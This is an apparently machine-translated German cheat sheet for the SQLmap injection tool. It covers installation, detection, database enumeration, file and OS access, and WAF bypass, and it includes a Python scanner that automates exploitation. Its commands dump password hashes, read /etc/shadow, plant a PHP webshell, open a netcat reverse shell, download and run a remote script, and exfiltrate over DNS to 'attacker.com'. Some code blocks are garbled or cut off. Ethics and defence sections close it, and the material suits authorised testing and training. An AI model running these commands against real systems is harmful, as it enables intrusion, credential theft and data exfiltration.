SQLmap Cheat Sheet¶
Überblick¶
SQLmap ist ein Open-Source-Pensionstest-Tool, das den Prozess der Erkennung und Ausnutzung von SQL-Injektionsfehlern und der Übernahme von Datenbankservern automatisiert. SQLmap wurde von Bernardo Damele und Miroslav Stampar entwickelt und hat sich zum de facto Standard für SQL-Injektionstests entwickelt und bietet umfassende Möglichkeiten zur Identifizierung, Ausbeutung und Nachbenutzung von SQL-Injektionslücken in einer Vielzahl von Datenbankverwaltungssystemen. Die hochentwickelten Erkennungsalgorithmen und umfangreiche Datenbank-Unterstützung machen es zu einem wesentlichen Bestandteil der Web Application Security Testing und Datenbank Security Assessment Workflows.
Die Kernkraft von SQLmap liegt in der fortschrittlichen SQL-Injektionserkennungs- und -ausbeutungsmaschine, die zahlreiche Injektionstechniken unterstützt, darunter booleanbasierte Blind-, zeitbasierte Blind-, fehlerbasierte, UNION-Abfrage-basierte, gestapelte Abfragen und Out-of-Band-Injektionsmethoden. SQLmap kann automatisch SQL-Injektionslücken in GET, POST, HTTP-Header und Cookie-Parametern erkennen und ausnutzen, während verschiedene Datenbankverwaltungssysteme wie MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, HSQLDB und Informix unterstützt werden. Die intelligenten Fingerabdruckfunktionen des Tools können Datenbankversionen, zugrunde liegende Betriebssysteme und Anwendungstechnologien identifizieren, um die Verwertungsstrategien zu optimieren.
SQLmap's umfassendes Feature-Set beinhaltet Datenbank-Enumerationsfunktionen für die Extraktion von Datenbankschemas, Tabellen, Spalten und Daten sowie erweiterte Funktionen für die Nachbenutzung von Dateisystemen, die Ausführung von Betriebssystemen und die Exfiltration von Daten aus dem Netzwerk. Das Tool unterstützt verschiedene Authentifizierungsmechanismen, Proxykonfigurationen und Evasionstechniken, um Web Application Firewalls und Intrusionserkennungssysteme zu umgehen. Mit seinen umfangreichen Anpassungsoptionen, detaillierten Logging-Funktionen und Integrationsunterstützung für automatisierte Sicherheitstest-Pipelines bietet SQLmap sowohl manuelle Testflexibilität als auch automatisierte Bewertungsmöglichkeiten für eine umfassende Datenbanksicherheitsvalidierung.
Installation¶
Ubuntu/Debian Installation¶
Installation von SQLmap auf Ubuntu/Debian-Systemen:
```bash
Update system packages¶
sudo apt update && sudo apt upgrade -y
Install SQLmap from repositories¶
sudo apt install -y sqlmap
Install dependencies¶
sudo apt install -y python3 python3-pip
Verify installation¶
sqlmap --version
Install latest version from source¶
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev cd sqlmap-dev
Run from source¶
python3 sqlmap.py --version
Install additional dependencies¶
pip3 install -r requirements.txt
Create symbolic link¶
sudo ln -sf $(pwd)/sqlmap.py /usr/local/bin/sqlmap
Verify installation¶
sqlmap --version ```_
CentOS/RHEL Installation¶
```bash
Install EPEL repository¶
sudo yum install -y epel-release
Install Python and Git¶
sudo yum install -y python3 python3-pip git
Clone SQLmap repository¶
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git cd sqlmap
Install dependencies¶
pip3 install -r requirements.txt
Create executable script¶
cat > /usr/local/bin/sqlmap ``<< 'EOF'
!/bin/bash¶
python3 /opt/sqlmap/sqlmap.py "$@" EOF
Move SQLmap to /opt¶
sudo mv sqlmap /opt/ sudo chmod +x /usr/local/bin/sqlmap
Verify installation¶
sqlmap --version ```_
macOS Installation¶
```bash
Install using Homebrew¶
brew install sqlmap
Install using MacPorts¶
sudo port install sqlmap
Install from source¶
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git cd sqlmap python3 sqlmap.py --version
Install Python dependencies¶
pip3 install -r requirements.txt
Verify installation¶
sqlmap --version ```_
Windows Installation¶
```bash
Download from GitHub¶
https://github.com/sqlmapproject/sqlmap/archive/master.zip¶
Extract to desired location¶
Example: C:\sqlmap¶
Install Python 3.x from python.org¶
Install dependencies¶
pip install -r requirements.txt
Run SQLmap¶
python sqlmap.py --version
Alternative: Install with Chocolatey¶
choco install sqlmap
Verify installation¶
sqlmap --version ```_
Docker Installation¶
SQLmap in Docker ausführen:
```bash
Pull official SQLmap image¶
docker pull paoloo/sqlmap
Run basic scan¶
docker run --rm paoloo/sqlmap -u "http://example.com/page.php?id=1"
Run with custom options¶
docker run --rm -v $(pwd):/data paoloo/sqlmap \ -u "http://example.com/page.php?id=1" \ --batch --output-dir=/data
Create custom Dockerfile¶
cat >`` Dockerfile.sqlmap << 'EOF' FROM python:3.9-alpine
Install dependencies¶
RUN apk add --no-cache git
Clone SQLmap¶
RUN git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git /opt/sqlmap
Set working directory¶
WORKDIR /opt/sqlmap
Install Python dependencies¶
RUN pip install -r requirements.txt
Create entrypoint¶
ENTRYPOINT ["python3", "sqlmap.py"] EOF
Build custom image¶
docker build -f Dockerfile.sqlmap -t sqlmap-custom .
Run custom image¶
docker run --rm sqlmap-custom --version ```_
Basisnutzung¶
Zielvorgabe¶
Zielvorgaben für SQL-Injektionstests:
```bash
Test single URL with parameter¶
sqlmap -u "http://example.com/page.php?id=1"
Test URL with multiple parameters¶
sqlmap -u "http://example.com/page.php?id=1&name;=test"
Test specific parameter¶
sqlmap -u "http://example.com/page.php?id=1&name;=test" -p id
Test POST data¶
sqlmap -u "http://example.com/login.php" --data="username=admin&password;=test"
Test from request file¶
sqlmap -r request.txt
Test from Burp Suite log¶
sqlmap -l burp.log
Test with custom headers¶
sqlmap -u "http://example.com/page.php?id=1" \ --headers="X-Forwarded-For: 127.0.0.1\nUser-Agent: Custom Agent"
Test with cookies¶
sqlmap -u "http://example.com/page.php?id=1" \ --cookie="PHPSESSID=abc123; user=admin"
Test HTTP methods¶
sqlmap -u "http://example.com/api/user/1" --method=PUT
Test with authentication¶
sqlmap -u "http://example.com/page.php?id=1" \ --auth-type=basic --auth-cred="admin:password"
Test HTTPS with custom certificate¶
sqlmap -u "https://example.com/page.php?id=1" \ --ignore-ssl-errors ```_
Erkennungsoptionen¶
Konfiguration der SQL-Injektionserkennung:
```bash
Basic detection¶
sqlmap -u "http://example.com/page.php?id=1"
Specify injection techniques¶
sqlmap -u "http://example.com/page.php?id=1" --technique=BEUST
B: Boolean-based blind¶
E: Error-based¶
U: Union query-based¶
S: Stacked queries¶
T: Time-based blind¶
Test specific DBMS¶
sqlmap -u "http://example.com/page.php?id=1" --dbms=mysql
Increase detection level¶
sqlmap -u "http://example.com/page.php?id=1" --level=5
Increase risk level¶
sqlmap -u "http://example.com/page.php?id=1" --risk=3
Test all parameters¶
sqlmap -u "http://example.com/page.php?id=1&name;=test" --all
Skip URL encoding¶
sqlmap -u "http://example.com/page.php?id=1" --skip-urlencode
Custom injection payloads¶
sqlmap -u "http://example.com/page.php?id=1" --tamper=space2comment
Test with time delay¶
sqlmap -u "http://example.com/page.php?id=1" --time-sec=10
Test with custom boundaries¶
sqlmap -u "http://example.com/page.php?id=1" --boundaries="*" ```_
Datenbankaufzählung¶
Aufzählung von Datenbankinformationen:
```bash
Get current user¶
sqlmap -u "http://example.com/page.php?id=1" --current-user
Get current database¶
sqlmap -u "http://example.com/page.php?id=1" --current-db
Check if user is DBA¶
sqlmap -u "http://example.com/page.php?id=1" --is-dba
List databases¶
sqlmap -u "http://example.com/page.php?id=1" --dbs
List tables in database¶
sqlmap -u "http://example.com/page.php?id=1" -D database_name --tables
List columns in table¶
sqlmap -u "http://example.com/page.php?id=1" -D database_name -T table_name --columns
Dump table data¶
sqlmap -u "http://example.com/page.php?id=1" -D database_name -T table_name --dump
Dump specific columns¶
sqlmap -u "http://example.com/page.php?id=1" -D database_name -T table_name -C "username,password" --dump
Dump all databases¶
sqlmap -u "http://example.com/page.php?id=1" --dump-all
Get database users¶
sqlmap -u "http://example.com/page.php?id=1" --users
Get user passwords¶
sqlmap -u "http://example.com/page.php?id=1" --passwords
Get user privileges¶
sqlmap -u "http://example.com/page.php?id=1" --privileges
Get database schema¶
sqlmap -u "http://example.com/page.php?id=1" --schema
Search for specific data¶
sqlmap -u "http://example.com/page.php?id=1" --search -C password ```_
Erweiterte Funktionen¶
Zugriff auf das System¶
Zugriff auf das Dateisystem durch SQL-Injektion:
```bash
Read file from file system¶
sqlmap -u "http://example.com/page.php?id=1" --file-read="/etc/passwd"
Write file to file system¶
sqlmap -u "http://example.com/page.php?id=1" --file-write="shell.php" --file-dest="/var/www/html/shell.php"
Upload file via SQL injection¶
echo "<?php system($_GET['cmd']); ?>" > webshell.php sqlmap -u "http://example.com/page.php?id=1" --file-write="webshell.php" --file-dest="/var/www/html/cmd.php"
Read common configuration files¶
sqlmap -u "http://example.com/page.php?id=1" --file-read="/etc/mysql/my.cnf" sqlmap -u "http://example.com/page.php?id=1" --file-read="/var/www/html/config.php" sqlmap -u "http://example.com/page.php?id=1" --file-read="/etc/apache2/apache2.conf"
Read application files¶
sqlmap -u "http://example.com/page.php?id=1" --file-read="/var/log/apache2/access.log" sqlmap -u "http://example.com/page.php?id=1" --file-read="/var/log/mysql/error.log"
Download multiple files¶
for file in /etc/passwd /etc/shadow /etc/hosts; do sqlmap -u "http://example.com/page.php?id=1" --file-read="$file" --batch done ```_
Zugriff auf das Betriebssystem¶
Befehle des Betriebssystems ausführen:
```bash
Execute OS commands¶
sqlmap -u "http://example.com/page.php?id=1" --os-cmd="whoami"
Interactive OS shell¶
sqlmap -u "http://example.com/page.php?id=1" --os-shell
Execute PowerShell commands (Windows)¶
sqlmap -u "http://example.com/page.php?id=1" --os-pwn
Upload and execute Meterpreter payload¶
sqlmap -u "http://example.com/page.php?id=1" --os-pwn --msf-path="/opt/metasploit-framework"
Execute commands with specific user¶
sqlmap -u "http://example.com/page.php?id=1" --os-cmd="id" --priv-esc
Execute batch commands¶
sqlmap -u "http://example.com/page.php?id=1" --os-cmd="uname -a; ps aux; netstat -tulpn"
Create reverse shell¶
sqlmap -u "http://example.com/page.php?id=1" --os-cmd="nc -e /bin/bash 192.168.1.100 4444"
Download and execute script¶
sqlmap -u "http://example.com/page.php?id=1" --os-cmd="wget http://192.168.1.100/script.sh -O /tmp/script.sh && chmod +x /tmp/script.sh && /tmp/script.sh" ```_
WAF Bypass Techniken¶
Umgehung der Web-Anwendung Firewalls:
```bash
Use tamper scripts¶
sqlmap -u "http://example.com/page.php?id=1" --tamper=space2comment sqlmap -u "http://example.com/page.php?id=1" --tamper=charencode sqlmap -u "http://example.com/page.php?id=1" --tamper=randomcase
Multiple tamper scripts¶
sqlmap -u "http://example.com/page.php?id=1" --tamper=space2comment,charencode,randomcase
Common WAF bypass tampers¶
sqlmap -u "http://example.com/page.php?id=1" --tamper=apostrophemask sqlmap -u "http://example.com/page.php?id=1" --tamper=equaltolike sqlmap -u "http://example.com/page.php?id=1" --tamper=greatest sqlmap -u "http://example.com/page.php?id=1" --tamper=halfversionedmorekeywords sqlmap -u "http://example.com/page.php?id=1" --tamper=modsecurityversioned sqlmap -u "http://example.com/page.php?id=1" --tamper=space2mysqldash sqlmap -u "http://example.com/page.php?id=1" --tamper=versionedkeywords sqlmap -u "http://example.com/page.php?id=1" --tamper=versionedmorekeywords
Custom User-Agent¶
sqlmap -u "http://example.com/page.php?id=1" --user-agent="Mozilla/5.0 (compatible; Googlebot/2.1)"
Random User-Agent¶
sqlmap -u "http://example.com/page.php?id=1" --random-agent
Custom delay between requests¶
sqlmap -u "http://example.com/page.php?id=1" --delay=2
Use proxy for requests¶
sqlmap -u "http://example.com/page.php?id=1" --proxy="http://127.0.0.1:8080"
Use Tor network¶
sqlmap -u "http://example.com/page.php?id=1" --tor --tor-type=SOCKS5
Chunked transfer encoding¶
sqlmap -u "http://example.com/page.php?id=1" --chunked ```_
Advanced Injection Techniques¶
Spezialisierte Injektionstechniken:
```bash
Second-order SQL injection¶
sqlmap -u "http://example.com/register.php" --data="username=admin&email;=test@test.com" --second-order="http://example.com/profile.php"
DNS exfiltration¶
sqlmap -u "http://example.com/page.php?id=1" --dns-domain="attacker.com"
Time-based blind injection with custom time¶
sqlmap -u "http://example.com/page.php?id=1" --technique=T --time-sec=5
Union-based injection with custom columns¶
sqlmap -u "http://example.com/page.php?id=1" --technique=U --union-cols=1-20
Error-based injection¶
sqlmap -u "http://example.com/page.php?id=1" --technique=E
Boolean-based blind injection¶
sqlmap -u "http://example.com/page.php?id=1" --technique=B
Stacked queries¶
sqlmap -u "http://example.com/page.php?id=1" --technique=S
Custom injection point¶
sqlmap -u "http://example.com/page.php" --data="id=1*&name;=test" --method=POST
JSON injection¶
sqlmap -u "http://example.com/api/user" --data='\\{"id": 1*, "name": "test"\\}' --headers="Content-Type: application/json"
XML injection¶
sqlmap -u "http://example.com/soap" --data='<?xml version="1.0"?>
Automatisierungsskripte¶
Umfassender SQL Injection Scanner¶
```python
!/usr/bin/env python3¶
Comprehensive SQL injection testing with SQLmap¶
import subprocess import json import os import sys import time import argparse from datetime import datetime import xml.etree.ElementTree as ET import requests from urllib.parse import urlparse, parse_qs
class SQLmapScanner: def init(self, sqlmap_path="sqlmap"): self.sqlmap_path = sqlmap_path self.results = \\{\\} self.session_dir = f"/tmp/sqlmap_session_\\{int(time.time())\\}"
def verify_sqlmap_installation(self):
"""Verify SQLmap installation"""
try:
result = subprocess.run([self.sqlmap_path, "--version"],
capture_output=True, text=True)
if result.returncode == 0:
version_line = result.stdout.strip()
print(f"SQLmap version: \\\\{version_line\\\\}")
return True
else:
print("SQLmap not found or not working")
return False
except Exception as e:
print(f"Error checking SQLmap installation: \\\\{e\\\\}")
return False
def create_session_directory(self):
"""Create session directory for SQLmap output"""
try:
os.makedirs(self.session_dir, exist_ok=True)
print(f"Session directory created: \\\\{self.session_dir\\\\}")
return True
except Exception as e:
print(f"Error creating session directory: \\\\{e\\\\}")
return False
def test_url_for_sqli(self, url, method="GET", data=None, headers=None, cookies=None):
"""Test URL for SQL injection vulnerabilities"""
print(f"Testing URL for SQL injection: \\\\{url\\\\}")
cmd = [
self.sqlmap_path,
"-u", url,
"--batch",
"--output-dir", self.session_dir,
"--level", "3",
"--risk", "2",
"--technique", "BEUST",
"--threads", "5"
]
if method.upper() == "POST" and data:
cmd.extend(["--data", data])
if headers:
header_string = "\n".join([f"\\\\{k\\\\}: \\\\{v\\\\}" for k, v in headers.items()])
cmd.extend(["--headers", header_string])
if cookies:
cookie_string = "; ".join([f"\\\\{k\\\\}=\\\\{v\\\\}" for k, v in cookies.items()])
cmd.extend(["--cookie", cookie_string])
try:
result = subprocess.run(cmd, capture_output=True, text=True, timeout=1800)
if result.returncode == 0:
vulnerable = self.parse_sqlmap_output(result.stdout)
return \\\\{
'vulnerable': vulnerable,
'output': result.stdout,
'error': result.stderr
\\\\}
else:
print(f"SQLmap test failed: \\\\{result.stderr\\\\}")
return \\\\{
'vulnerable': False,
'output': result.stdout,
'error': result.stderr
\\\\}
except subprocess.TimeoutExpired:
print("SQLmap test timed out")
return \\\\{
'vulnerable': False,
'output': "",
'error': "Timeout"
\\\\}
except Exception as e:
print(f"Error during SQLmap test: \\\\{e\\\\}")
return \\\\{
'vulnerable': False,
'output': "",
'error': str(e)
\\\\}
def parse_sqlmap_output(self, output):
"""Parse SQLmap output to determine if vulnerable"""
vulnerable_indicators = [
"is vulnerable",
"injectable",
"Parameter:",
"Type:",
"Title:",
"Payload:"
]
for indicator in vulnerable_indicators:
if indicator in output:
return True
return False
def enumerate_database(self, url, method="GET", data=None):
"""Enumerate database information"""
print(f"Enumerating database for: \\\\{url\\\\}")
enumeration_commands = [
["--current-user"],
["--current-db"],
["--is-dba"],
["--dbs"],
["--users"],
["--passwords"]
]
enumeration_results = \\\\{\\\\}
for enum_cmd in enumeration_commands:
cmd = [
self.sqlmap_path,
"-u", url,
"--batch",
"--output-dir", self.session_dir
]
if method.upper() == "POST" and data:
cmd.extend(["--data", data])
cmd.extend(enum_cmd)
try:
result = subprocess.run(cmd, capture_output=True, text=True, timeout=600)
if result.returncode == 0:
enum_type = enum_cmd[0].replace("--", "")
enumeration_results[enum_type] = \\\\{
'output': result.stdout,
'success': True
\\\\}
else:
enum_type = enum_cmd[0].replace("--", "")
enumeration_results[enum_type] = \\\\{
'output': result.stderr,
'success': False
\\\\}
except subprocess.TimeoutExpired:
enum_type = enum_cmd[0].replace("--", "")
enumeration_results[enum_type] = \\\\{
'output': "Timeout",
'success': False
\\\\}
except Exception as e:
enum_type = enum_cmd[0].replace("--", "")
enumeration_results[enum_type] = \\\\{
'output': str(e),
'success': False
\\\\}
return enumeration_results
def dump_database_data(self, url, database=None, table=None, columns=None):
"""Dump database data"""
print(f"Dumping database data for: \\\\{url\\\\}")
cmd = [
self.sqlmap_path,
"-u", url,
"--batch",
"--output-dir", self.session_dir
]
if database and table and columns:
cmd.extend(["-D", database, "-T", table, "-C", columns, "--dump"])
elif database and table:
cmd.extend(["-D", database, "-T", table, "--dump"])
elif database:
cmd.extend(["-D", database, "--tables"])
else:
cmd.extend(["--dbs"])
try:
result = subprocess.run(cmd, capture_output=True, text=True, timeout=1800)
if result.returncode == 0:
return \\\\{
'success': True,
'output': result.stdout,
'error': result.stderr
\\\\}
else:
return \\\\{
'success': False,
'output': result.stdout,
'error': result.stderr
\\\\}
except subprocess.TimeoutExpired:
return \\\\{
'success': False,
'output': "",
'error': "Timeout"
\\\\}
except Exception as e:
return \\\\{
'success': False,
'output': "",
'error': str(e)
\\\\}
def test_file_access(self, url):
"""Test file system access capabilities"""
print(f"Testing file access for: \\\\{url\\\\}")
test_files = [
"/etc/passwd",
"/etc/hosts",
"/var/www/html/index.php",
"C:\\Windows\\System32\\drivers\\etc\\hosts",
"C:\\inetpub\\wwwroot\\web.config"
]
file_access_results = \\\\{\\\\}
for test_file in test_files:
cmd = [
self.sqlmap_path,
"-u", url,
"--batch",
"--output-dir", self.session_dir,
"--file-read", test_file
]
try:
result = subprocess.run(cmd, capture_output=True, text=True, timeout=300)
file_access_results[test_file] = \\\\{
'accessible': result.returncode == 0 and "do you want to retrieve" not in result.stdout,
'output': result.stdout,
'error': result.stderr
\\\\}
except subprocess.TimeoutExpired:
file_access_results[test_file] = \\\\{
'accessible': False,
'output': "",
'error': "Timeout"
\\\\}
except Exception as e:
file_access_results[test_file] = \\\\{
'accessible': False,
'output': "",
'error': str(e)
\\\\}
return file_access_results
def test_os_access(self, url):
"""Test operating system command execution"""
print(f"Testing OS access for: \\\\{url\\\\}")
test_commands = [
"whoami",
"id",
"uname -a",
"systeminfo"
]
os_access_results = \\\\{\\\\}
for test_cmd in test_commands:
cmd = [
self.sqlmap_path,
"-u", url,
"--batch",
"--output-dir", self.session_dir,
"--os-cmd", test_cmd
]
try:
result = subprocess.run(cmd, capture_output=True, text=True, timeout=300)
os_access_results[test_cmd] = \\\\{
'executed': result.returncode == 0 and "command standard output" in result.stdout,
'output': result.stdout,
'error': result.stderr
\\\\}
except subprocess.TimeoutExpired:
os_access_results[test_cmd] = \\\\{
'executed': False,
'output': "",
'error': "Timeout"
\\\\}
except Exception as e:
os_access_results[test_cmd] = \\\\{
'executed': False,
'output': "",
'error': str(e)
\\\\}
return os_access_results
def comprehensive_scan(self, target_urls, output_dir="/tmp/sqlmap_comprehensive"):
"""Perform comprehensive SQL injection assessment"""
print("Starting comprehensive SQL injection assessment...")
# Create output directory
os.makedirs(output_dir, exist_ok=True)
assessment_results = \\\\{
'start_time': time.time(),
'target_urls': target_urls,
'vulnerable_urls': [],
'enumeration_results': \\\\{\\\\},
'file_access_results': \\\\{\\\\},
'os_access_results': \\\\{\\\\},
'dump_results': \\\\{\\\\}
\\\\}
for url in target_urls:
print(f"Testing URL: \\\\{url\\\\}")
# Test for SQL injection
sqli_result = self.test_url_for_sqli(url)
if sqli_result['vulnerable']:
print(f"SQL injection found in: \\\\{url\\\\}")
assessment_results['vulnerable_urls'].append(url)
# Enumerate database
enum_results = self.enumerate_database(url)
assessment_results['enumeration_results'][url] = enum_results
# Test file access
file_results = self.test_file_access(url)
assessment_results['file_access_results'][url] = file_results
# Test OS access
os_results = self.test_os_access(url)
assessment_results['os_access_results'][url] = os_results
# Dump sample data
dump_results = self.dump_database_data(url)
assessment_results['dump_results'][url] = dump_results
else:
print(f"No SQL injection found in: \\\\{url\\\\}")
assessment_results['end_time'] = time.time()
assessment_results['duration'] = assessment_results['end_time'] - assessment_results['start_time']
# Generate reports
self.generate_json_report(assessment_results, os.path.join(output_dir, "sqlmap_results.json"))
self.generate_html_report(assessment_results, os.path.join(output_dir, "sqlmap_report.html"))
print(f"Comprehensive assessment completed in \\\\{assessment_results['duration']:.2f\\\\} seconds")
print(f"Found SQL injection in \\\\{len(assessment_results['vulnerable_urls'])\\\\} URLs")
return assessment_results
def generate_json_report(self, results, output_file):
"""Generate JSON report"""
with open(output_file, 'w') as f:
json.dump(results, f, indent=2, default=str)
print(f"JSON report generated: \\\\{output_file\\\\}")
def generate_html_report(self, results, output_file):
"""Generate HTML report"""
html_content = f"""
SQLmap Comprehensive Assessment Report
Generated: \\\\{datetime.now().isoformat()\\\\}
Assessment Duration: \\\\{results['duration']:.2f\\\\} seconds
Executive Summary
- Total URLs Tested: \\\\{len(results['target_urls'])\\\\}
- Vulnerable URLs: \\\\{len(results['vulnerable_urls'])\\\\}
- File Access Possible: \\\\{sum(1 for url_results in results['file_access_results'].values() for file_result in url_results.values() if file_result['accessible'])\\\\}
- OS Command Execution: \\\\{sum(1 for url_results in results['os_access_results'].values() for cmd_result in url_results.values() if cmd_result['executed'])\\\\}
Vulnerable URLs
| URL | Database Access | File Access | OS Access |
|---|---|---|---|
| \\\\{url\\\\} | \\\\{db_access\\\\} | \\\\{file_access\\\\} | \\\\{os_access\\\\} |
Detailed Findings
""" for url in results['vulnerable_urls']: html_content += f"""\\\\{url\\\\}
Database Enumeration
\\\\{json.dumps(results['enumeration_results'].get(url, \\\\{\\\\}), indent=2)\\\\}
File Access Results
\\\\{json.dumps(results['file_access_results'].get(url, \\\\{\\\\}), indent=2)\\\\}
OS Access Results
\\\\{json.dumps(results['os_access_results'].get(url, \\\\{\\\\}), indent=2)\\\\}
"""
html_content += """
Recommendations
- Implement parameterized queries/prepared statements
- Use input validation and sanitization
- Apply principle of least privilege for database accounts
- Implement Web Application Firewall (WAF)
- Regular security code reviews and testing
- Keep database software updated
- Monitor database access and queries
"""
with open(output_file, 'w') as f:
f.write(html_content)
print(f"HTML report generated: \\\\{output_file\\\\}")
def main(): parser = argparse.ArgumentParser(description='SQLmap Comprehensive Scanner') parser.add_argument('--urls', nargs='+', required=True, help='URLs to test') parser.add_argument('--output', default='/tmp/sqlmap_assessment', help='Output directory') parser.add_argument('--sqlmap-path', default='sqlmap', help='Path to SQLmap executable')
args = parser.parse_args()
# Initialize scanner
scanner = SQLmapScanner(args.sqlmap_path)
# Verify installation
if not scanner.verify_sqlmap_installation():
print("SQLmap not properly installed or configured")
sys.exit(1)
# Create session directory
if not scanner.create_session_directory():
print("Failed to create session directory")
sys.exit(1)
# Run comprehensive scan
results = scanner.comprehensive_scan(args.urls, args.output)
if results:
print("Comprehensive assessment completed successfully")
else:
print("Comprehensive assessment failed")
sys.exit(1)
if name == "main": main() ```_
Integrationsbeispiele¶
CI/CD Integration¶
```yaml
Jenkins Pipeline for SQLmap Integration¶
pipeline \\{ agent \\{ label 'security-testing' \\}
environment \\\\{
TARGET_URL = 'http: //test-app.company.com'
SQLMAP_OUTPUT = './sqlmap-results'
\\\\}
stages \\\\{
stage('Setup Environment') \\\\{
steps \\\\{
script \\\\{
// Install SQLmap if not present
sh '''
if ! command -v sqlmap &> /dev/null; then
git clone https: //github.com/sqlmapproject/sqlmap.git
export PATH=$PATH: $(pwd)/sqlmap
fi
sqlmap --version
'''
\\\\}
\\\\}
\\\\}
stage('SQL Injection Testing') \\\\{
steps \\\\{
script \\\\{
// Run SQLmap tests
sh '''
mkdir -p $\\\\{SQLMAP_OUTPUT\\\\}
# Test main application endpoints
python3 sqlmap_scanner.py \
--urls "$\\\\{TARGET_URL\\\\}/login.php?id=1" \
"$\\\\{TARGET_URL\\\\}/search.php?q=test" \
"$\\\\{TARGET_URL\\\\}/product.php?id=1" \
--output $\\\\{SQLMAP_OUTPUT\\\\}
'''
\\\\}
\\\\}
\\\\}
stage('Process Results') \\\\{
steps \\\\{
// Archive results
archiveArtifacts artifacts: 'sqlmap-results/**/*', fingerprint: true
// Publish report
publishHTML([
allowMissing: false,
alwaysLinkToLastBuild: true,
keepAll: true,
reportDir: 'sqlmap-results',
reportFiles: '*.html',
reportName: 'SQLmap Assessment Report'
])
// Check for vulnerabilities
script \\\\{
def vulnerabilities = sh(
| | script: "grep -c 'vulnerable' sqlmap-results/*.json | | true", | | returnStdout: true ).trim()
if (vulnerabilities.toInteger() > 0) \\\\{
currentBuild.result = 'UNSTABLE'
echo "Found $\\\\{vulnerabilities\\\\} SQL injection vulnerabilities"
\\\\}
\\\\}
\\\\}
\\\\}
\\\\}
post \\\\{
always \\\\{
// Clean up sensitive data
sh 'rm -rf sqlmap-results/*.log'
\\\\}
failure \\\\{
// Send notification
emailext (
subject: "SQL Injection Testing Failed: $\\\\{env.JOB_NAME\\\\} - $\\\\{env.BUILD_NUMBER\\\\}",
body: "SQL injection testing failed. Check console output for details.",
to: "$\\\\{env.SECURITY_TEAM_EMAIL\\\\}"
)
\\\\}
\\\\}
\\} ```_
Fehlerbehebung¶
Gemeinsame Themen¶
Anmeldefragen: ```bash
Test basic connectivity¶
curl -I "http://example.com/page.php?id=1"
Use proxy for debugging¶
sqlmap -u "http://example.com/page.php?id=1" --proxy="http://127.0.0.1:8080"
Ignore SSL errors¶
sqlmap -u "https://example.com/page.php?id=1" --ignore-ssl-errors
Custom timeout¶
sqlmap -u "http://example.com/page.php?id=1" --timeout=30
Retry failed requests¶
sqlmap -u "http://example.com/page.php?id=1" --retries=3 ```_
Detection Issues: ```bash
Increase detection level and risk¶
sqlmap -u "http://example.com/page.php?id=1" --level=5 --risk=3
Test all parameters¶
sqlmap -u "http://example.com/page.php?id=1&name;=test" --all
Force specific DBMS¶
sqlmap -u "http://example.com/page.php?id=1" --dbms=mysql --force-ssl
Use different techniques¶
sqlmap -u "http://example.com/page.php?id=1" --technique=T --time-sec=10
Skip URL encoding¶
sqlmap -u "http://example.com/page.php?id=1" --skip-urlencode ```_
** WAF Bypass Issues:** ```bash
Use multiple tamper scripts¶
sqlmap -u "http://example.com/page.php?id=1" --tamper=space2comment,charencode,randomcase
Random User-Agent¶
sqlmap -u "http://example.com/page.php?id=1" --random-agent
Add delays¶
sqlmap -u "http://example.com/page.php?id=1" --delay=3
Use Tor¶
sqlmap -u "http://example.com/page.php?id=1" --tor --tor-type=SOCKS5
Custom headers¶
sqlmap -u "http://example.com/page.php?id=1" --headers="X-Originating-IP: 127.0.0.1" ```_
Leistungsoptimierung¶
Optimierung der SQLmap-Leistung:
```bash
Increase threads¶
sqlmap -u "http://example.com/page.php?id=1" --threads=10
Optimize for speed¶
sqlmap -u "http://example.com/page.php?id=1" --level=1 --risk=1
Skip unnecessary tests¶
sqlmap -u "http://example.com/page.php?id=1" --skip-waf
Use specific technique¶
sqlmap -u "http://example.com/page.php?id=1" --technique=U
Limit data retrieval¶
sqlmap -u "http://example.com/page.php?id=1" -D database -T table --start=1 --stop=100 ```_
Sicherheitsüberlegungen¶
Operationelle Sicherheit¶
Legal und Ethische Nutzung: - Nur Testanwendungen, die Sie besitzen oder eine ausdrückliche Erlaubnis zum Testen haben - Rechtsanforderungen für Web-Anwendungstests in Ihrer Gerichtsbarkeit verstehen - Durchführung ordnungsgemäßer Berechtigungs- und Dokumentationsverfahren - Einschränkungen des Umfangs und Regeln des Engagements - Bewusstsein für mögliche Datenexposition und Servicestörungen
Datenschutz: - Verschlüsseln von SQLmap-Sitzungsdateien und Ausgabedaten - Umsetzung sicherer Datenschutzbestimmungen für Bewertungsergebnisse - Zugriff auf SQL-Injektionstests und -Ergebnisse steuern - Sichere Übermittlung von Bewertungsberichten und Erkenntnissen - Regelmäßige Reinigung von temporären Dateien und Sitzungsdaten
Defensive Überlegungen¶
** Erkennung und Prävention:** - Monitor für SQLmap Signaturen und SQL-Injektionsmuster - Web Application Firewalls (WAF) mit SQL Injektionsschutz implementieren - Bereitstellung von Datenbankaktivitätsüberwachung und Anomalieerkennung - Regelmäßige Sicherheitscodebewertungen und statische Analyse - Eingangsvalidierung und parametrisierte Abfrage-Implementierung
Referenzen¶
- SQLmap Offizielle Dokumentation
- SQLmap GitHub Repository
- [OWASP SQL Injection Prevention](https://LINK_5_
- [SQL Injection Testing Guide](LINK_5_
- (LINK_5_)